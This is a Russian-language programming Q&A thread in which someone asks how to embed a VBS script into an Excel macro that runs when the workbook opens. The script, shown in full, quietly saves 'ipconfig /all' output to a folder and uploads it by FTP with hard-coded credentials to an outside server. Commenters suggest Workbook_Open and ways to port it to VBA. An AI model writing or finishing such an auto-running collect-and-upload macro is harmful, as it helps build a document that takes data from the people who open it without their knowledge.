# Вставить VBS код в макрос

Tags: vba

Имеется VBS скрипт, который нужно вставить в макросы документа Excel. Запускался данный скрипт по открытию документа. Возможно ли такое?

```html
Dim oShell,fs
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd.exe /C md C:\cls"
WScript.Sleep 1000
oShell.run "cmd.exe /C ipconfig /all "& str & " > c:\cls\log.txt"
Set oShell = Nothing

WScript.Sleep 5000

Set oShell = CreateObject("Shell.Application")
Set objFSO = CreateObject("Scripting.FileSystemObject")

path = "C:\cls\"

FTPUpload(path)
Sub FTPUpload(path)

On Error Resume Next

Const copyType = 16

waitTime = 80000

FTPUser = "test"
FTPPass = "testpwd"
FTPHost = "test.com"
FTPDir = "/htdocs/"

strFTP = "ftp://" & FTPUser & ":" & FTPPass & "@" & FTPHost & FTPDir
Set objFTP = oShell.NameSpace(strFTP)

    
If objFSO.FileExists(path) Then

Set objFile = objFSO.getFile(path)
strParent = objFile.ParentFolder
Set objFolder = oShell.NameSpace(strParent)

Set objItem = objFolder.ParseName(objFile.Name)


objFTP.CopyHere objItem, copyType


End If


If objFSO.FolderExists(path) Then

Set objFolder = oShell.NameSpace(path)

objFTP.CopyHere objFolder.Items, copyType

End If


If Err.Number <> 0 Then
Wscript.Echo "Error: " & Err.Description
End If


Wscript.Sleep waitTime

End Sub
```

Данный код делает следующее:
Он запускает создает папку в корне диска с название cls и запускает cmd и делает команду ipconfig /all и сохраняет лог в папку.

После авторизовывается на сервере и перекачивает все содержимое в папке cls на сервер.

Comment: *VBS*-человеческий-*VBA*. Вы компилируете в человеческий, потом с человеческого переводим в макрос :) Событие открытия книги - *Private Sub Workbook_Open()*

Comment: @vikttur я пробывал так делать, выходит ошибка. Поэтому и прошу помощи

Comment: Вы тоже должны помочь: добавьте ниже кода описание - расскажите логику работы. Нет *VBS*, есть описание задачи

Comment: @vikttur добавил описание

Comment: Увы... Похоже, в таком комплексе *VBA* не поможет. Но могу чего-то не знать.

Comment: Подключите рантайм-библиотеку. Оформите свой код отдельным модулем. Укажите точные типы переменных (или вообще смените тип связывания). Должно взлететь практически сразу. Но вообще мне сомнительно, что в Workbook_Open можно запускать внешние асинхронные операции... я бы переписал всё это на VBA, тем более что код простейший.